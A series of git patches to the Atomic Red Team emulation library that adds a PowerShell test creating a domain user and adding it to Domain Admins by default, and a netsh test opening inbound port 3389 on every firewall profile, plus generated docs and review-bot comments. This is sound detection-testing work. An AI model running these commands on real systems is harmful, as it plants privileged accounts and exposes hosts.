From 6f3085ee178a31498405cb5f42a60d9428ff061c Mon Sep 17 00:00:00 2001 From: Jil Larner Date: Mon, 17 Aug 2020 18:09:53 +0200 Subject: [PATCH 01/19] T1098 - Implemented domain account manipulation (#1201) * Implemented Domain account manipulation * remove manually specified GUID removing GUID so it can be assigned at merge time. Co-authored-by: Didier Cambefort Co-authored-by: Carrie Roberts --- atomics/T1098/T1098.yaml | 63 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 6975f5ac..75aa110d 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml 
@@ -28,3 +28,66 @@ atomic_tests:
 name: powershell
 elevation_required: true
+- name: Domain Account and Group Manipulate
+ description: |
+ Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
+
+ The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+ you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to
+ create the user and alter the group. Automatic installation of the dependency requires an elevated session,
+ and is unlikely to work with Powershell Core (untested).
+
+ If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+ service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+ as group manager of the target group.
+
+ Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+ supported_platforms:
+ - windows
+ input_arguments:
+ account_prefix:
+ description: |
+ Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+ a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
+ type: String
+ default: atr-
+ group:
+ description: Name of the group to alter
+ type: String
+ default: "Domain Admins"
+ create_args:
+ description: Additional string appended to New-ADUser call
+ type: String
+ default: ""
+ dependencies:
+ - description: |
+ PS Module ActiveDirectory
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ command: |
+ $x = Get-Random -Minimum 2 -Maximum 99
+ $y = Get-Random -Minimum 2 -Maximum 99
+ $z = Get-Random -Minimum 2 -Maximum 99
+ $w = Get-Random -Minimum 2 -Maximum 99
+
+ Import-Module ActiveDirectory
+ $account = "#{account_prefix}-$x$y$z"
+ New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+ Add-ADGroupMember "#{group}" $account
+ cleanup_command: |
+ Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+ name: powershell
+
From 1427393485a5a4f98fbbf8b2ef2f610b703f211d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 17 Aug 2020 16:10:14 +0000 Subject: [PATCH 02/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 59 ++++++++++++++ atomics/T1098/T1098.md | 79 +++++++++++++++++++ atomics/T1098/T1098.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 144 insertions(+)
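Review bot: `$w` in the executor command is assigned from Get-Random but never read; `$account` is built from `$x$y$z` only, so the `$w` line should be dropped or the value folded into the name. With the default prefix `atr-`, the literal hyphen in `"#{account_prefix}-$x$y$z"` produces names like `atr--nn`, and each random value is one or two digits, so the description's `atr-nnnnnnnn` does not describe what is created; the cleanup filter `samaccountname=#{account_prefix}-*` uses the same double hyphen, so cleanup still matches. That cleanup removes every account matching the filter plus `givenName=Test`, not only the one created in this run, and `#{create_args}` is spliced unquoted into the New-ADUser call, so the description should state both explicitly given the default target group is `Domain Admins`. The test also omits `elevation_required`, unlike the preceding test in this file, although its `get_prereq_command` installs a Windows capability or feature; `elevation_required: true` under `executor` appears warranted. The same executor text is mirrored into the generated index.yaml and T1098.md in the following patch and would need regenerating after the fix.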
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 76477b2f..cdc465b8 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -82,6 +82,7 @@ persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,9 persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell +persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e6b9267c..c21a6702 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -193,6 +193,7 @@ defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1 defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell +persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index addbc85e..7c83286b 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -176,6 +176,7 @@ - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] + - Atomic Test #2: Domain Account and Group Manipulate [windows] - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 9b2fe722..a81fc672 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -374,6 +374,7 @@ - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] + - Atomic Test #2: Domain Account and Group Manipulate [windows] - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f910c7a2..1b7c1f46 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -8461,6 +8461,65 @@ persistence: } name: powershell elevation_required: true + - name: Domain Account and Group Manipulate + auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + description: "Create a random atr-nnnnnnnn account and add it to a domain group + (by default, Domain Admins). \n\nThe quickest way to run it is against a domain + controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need + to install PS Module ActiveDirectory (in prereqs) and run the script with + appropriare AD privileges to \ncreate the user and alter the group. Automatic + installation of the dependency requires an elevated session, \nand is unlikely + to work with Powershell Core (untested).\n\nIf you consider running this test + against a production Active Directory, the good practise is to create a dedicated\nservice + account whose delegation is given onto a dedicated OU for user creation and + deletion, as well as delegated\nas group manager of the target group.\n\nExample: + `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and + Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n" + supported_platforms: + - windows + input_arguments: + account_prefix: + description: | + Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on + a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. 
+ type: String + default: atr- + group: + description: Name of the group to alter + type: String + default: Domain Admins + create_args: + description: Additional string appended to New-ADUser call + type: String + default: '' + dependencies: + - description: 'PS Module ActiveDirectory + +' + prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop + | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + command: | + $x = Get-Random -Minimum 2 -Maximum 99 + $y = Get-Random -Minimum 2 -Maximum 99 + $z = Get-Random -Minimum 2 -Maximum 99 + $w = Get-Random -Minimum 2 -Maximum 99 + + Import-Module ActiveDirectory + $account = "#{account_prefix}-$x$y$z" + New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} + Add-ADGroupMember "#{group}" $account + cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" + | Remove-ADUser -Confirm:$False + +' + name: powershell T1098.003: technique: external_references: diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index 10ff8ce7..0fc6af21 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -6,6 +6,8 @@ - [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) +- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate) +
@@ -45,4 +47,81 @@ foreach($member in $fmm) { +
+
+ +## Atomic Test #2 - Domain Account and Group Manipulate +Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). + +The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, +you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to +create the user and alter the group. Automatic installation of the dependency requires an elevated session, +and is unlikely to work with Powershell Core (untested). + +If you consider running this test against a production Active Directory, the good practise is to create a dedicated +service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated +as group manager of the target group. + +Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on +a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-| +| group | Name of the group to alter | String | Domain Admins| +| create_args | Additional string appended to New-ADUser call | String | | + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +$x = Get-Random -Minimum 2 -Maximum 99 +$y = Get-Random -Minimum 2 -Maximum 99 +$z = Get-Random -Minimum 2 -Maximum 99 +$w = Get-Random -Minimum 2 -Maximum 99 + +Import-Module ActiveDirectory +$account = "#{account_prefix}-$x$y$z" +New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} +Add-ADGroupMember "#{group}" $account +``` + +#### Cleanup Commands: +```powershell +Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: PS Module ActiveDirectory +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + +
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 75aa110d..73a14391 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -29,6 +29,7 @@ atomic_tests: elevation_required: true - name: Domain Account and Group Manipulate + auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 description: | Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1b91ea58..a25259c9 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -565,3 +565,4 @@ b5656f67-d67f-4de8-8e62-b5581630f528 1620de42-160a-4fe5-bbaf-d3fef0181ce9 db020456-125b-4c8b-a4a7-487df8afb5a2 804f28fc-68fc-40da-b5a2-e9d0bce5c193 +a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 From f294dedadc1fc9be444bca0bfcd332e87f09ad1b Mon Sep 17 00:00:00 2001 From: Tsora-Pop <35981510+Tsora-Pop@users.noreply.github.com> Date: Mon, 17 Aug 2020 11:14:16 -0500 Subject: [PATCH 03/19] New T1562.004 Test "Open local port through Windows Firewall for any profile" (#1200) * Update T1562.004.yaml added new atomic test to open a port through Windows Firewall to any profile * Update T1562.004.yaml added some fixes to command and cleanup Co-authored-by: Carrie Roberts --- atomics/T1562.004/T1562.004.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index cb52d1d4..c234e0e2 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml 
@@ -61,3 +61,17 @@ atomic_tests:
 cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1
 name: command_prompt
 elevation_required: true
+- name: Open a local port through Windows Firewall to any profile
+ description: This test will attempt to open a local port defined by input arguments to any profile
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_port:
+ description: This is the local port you wish to test opening
+ type: integer
+ default: 3389
+ executor:
+ command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
+ cleanup_command: netsh advfirewall firewall delete rule name="Open Port to Any"
+ name: powershell
+ elevation_required: true
From 405126235f21367c28e69bcdab6c045a71255228 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 17 Aug 2020 16:14:43 +0000 Subject: [PATCH 04/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 18 ++++++++++ atomics/T1562.004/T1562.004.md | 35 +++++++++++++++++++ atomics/T1562.004/T1562.004.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 59 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cdc465b8..69df03ea 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
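Review bot: The new executor declares `name: powershell` while its command is a plain `netsh` invocation of the same form as the preceding tests in this file, which declare `name: command_prompt`; `netsh` runs under either, but keeping `command_prompt` matches the siblings and avoids a second interpreter's quoting rules around `name="Open Port to Any"`. The cleanup deletes by rule name alone, so it removes every rule called `Open Port to Any`, including any that existed before the test; qualifying it the way the previous test's cleanup does, `netsh advfirewall firewall delete rule name="Open Port to Any" protocol=tcp localport=#{local_port}`, limits it to the rule this test added. Since the default `local_port` is 3389 and the rule is `dir=in ... action=allow profile=any`, the description should state plainly that the port is exposed inbound on every profile until cleanup runs; "to any profile" as written leaves that implicit.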
@@ -249,6 +249,7 @@ defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables f defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c21a6702..24a2d7de 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -81,6 +81,7 @@ defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HT defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,9,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,10,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,11,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 7c83286b..af181089 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -517,6 +517,7 @@ - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] - Atomic Test #2: Disable Cb Response [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a81fc672..7880cd3c 100644 
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -170,6 +170,7 @@ - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #9: Unload Sysmon Filter Driver [windows] - Atomic Test #10: Uninstall Sysmon [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1b7c1f46..2d4744b5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -23747,6 +23747,24 @@ defense-evasion: protocol=TCP localport=450 >nul 2>&1 name: command_prompt elevation_required: true + - name: Open a local port through Windows Firewall to any profile + auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed + description: This test will attempt to open a local port defined by input arguments + to any profile + supported_platforms: + - windows + input_arguments: + local_port: + description: This is the local port you wish to test opening + type: integer + default: 3389 + executor: + command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in + protocol=tcp localport=#{local_port} action=allow profile=any + cleanup_command: netsh advfirewall firewall delete rule name="Open Port to + Any" + name: powershell + elevation_required: true T1562.001: technique: created: '2020-02-21T20:32:20.810Z' diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 45a3cf09..60c112e6 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md 
@@ -14,6 +14,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain) +- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile) +
@@ -136,4 +138,37 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp +
+
+ +## Atomic Test #5 - Open a local port through Windows Firewall to any profile +This test will attempt to open a local port defined by input arguments to any profile + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| local_port | This is the local port you wish to test opening | integer | 3389| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any +``` + +#### Cleanup Commands: +```powershell +netsh advfirewall firewall delete rule name="Open Port to Any" +``` + + + + +
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index c234e0e2..a9aeb382 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -62,6 +62,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Open a local port through Windows Firewall to any profile + auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed description: This test will attempt to open a local port defined by input arguments to any profile supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a25259c9..16301ed5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -566,3 +566,4 @@ b5656f67-d67f-4de8-8e62-b5581630f528 db020456-125b-4c8b-a4a7-487df8afb5a2 804f28fc-68fc-40da-b5a2-e9d0bce5c193 a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 +9636dd6e-7599-40d2-8eee-ac16434f35ed From af15596708fca975556b09b6e331b0b7147df523 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Tue, 18 Aug 2020 11:21:07 -0600 Subject: [PATCH 05/19] Add link to new Wiki page on contributing (#1193) * point to wiki * just edit link on top to point to new wiki --- docs/contributing.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/docs/contributing.md b/docs/contributing.md index 4ad4f30a..eb87acb6 100644 --- a/docs/contributing.md +++ b/docs/contributing.md @@ -3,8 +3,7 @@ layout: default --- # Contributing to Atomic Red Team -*NOTE: We have sweet stickers for people who contribute; if you’re interested send a message to -gear@redcanary.com with your mailing address* +*NOTE: An updated version of this contributing reference is found over on the Wiki [here](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) * - [Atomic Philosophy](#atomic-philosophy) - [How to contribute](#how-to-contribute) From 9293e1810228f78785ab9b48d3c32cd89c92454e Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Tue, 18 Aug 2020 11:31:09 -0600 Subject: [PATCH 06/19] Update the Readme to point to the new Wiki (#1192) * readme points to wiki now * update readme --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 6c88ff3e..3b79cc8a 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ Atomic Red Team allows every security team to test their controls by executing simple "atomic tests" that exercise the same techniques used by adversaries (all mapped to -[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)). +[Mitre's ATT&CK](https://attack.mitre.org)). ## Philosophy 
@@ -38,14 +38,14 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr ## Getting Started -* [Getting Started With Atomic Tests](https://atomicredteam.io/testing) +* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) * Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks) * Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index-by-tactic.md)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv)) * Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json)) -* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications +* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications * Have questions? 
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/) From c288b163f7d40dd03687d44eb86b1e3e744a96ba Mon Sep 17 00:00:00 2001 From: Jesse Brown Date: Tue, 18 Aug 2020 13:34:31 -0400 Subject: [PATCH 07/19] [UPDATE] COR_PROFILER to new ID (T1574.012) (#1191) * [UPDATE] COR_PROFILER technique * remove md file Co-authored-by: Carrie Roberts --- atomics/T1546.015/T1546.015.md | 182 ------------------ .../T1574.012.yaml} | 34 ++-- .../bin/T1574.012x64.dll} | Bin .../src/atomicNotepad.sln | 0 .../src/atomicNotepad/atomicNotepad.vcxproj | 0 .../atomicNotepad.vcxproj.filters | 0 .../atomicNotepad/atomicNotepad.vcxproj.user | 0 .../src/atomicNotepad/dllmain.cpp | 0 .../src/atomicNotepad/framework.h | 0 .../src/atomicNotepad/pch.cpp | 0 .../src/atomicNotepad/pch.h | 0 .../src/x64/Release/atomicNotepad.dll | Bin 12 files changed, 20 insertions(+), 196 deletions(-) delete mode 100644 atomics/T1546.015/T1546.015.md rename atomics/{T1546.015/T1546.015.yaml => T1574.012/T1574.012.yaml} (83%) rename atomics/{T1546.015/bin/T1546.015x64.dll => T1574.012/bin/T1574.012x64.dll} (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad.sln (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj.filters (100%) rename atomics/{T1546.015 => 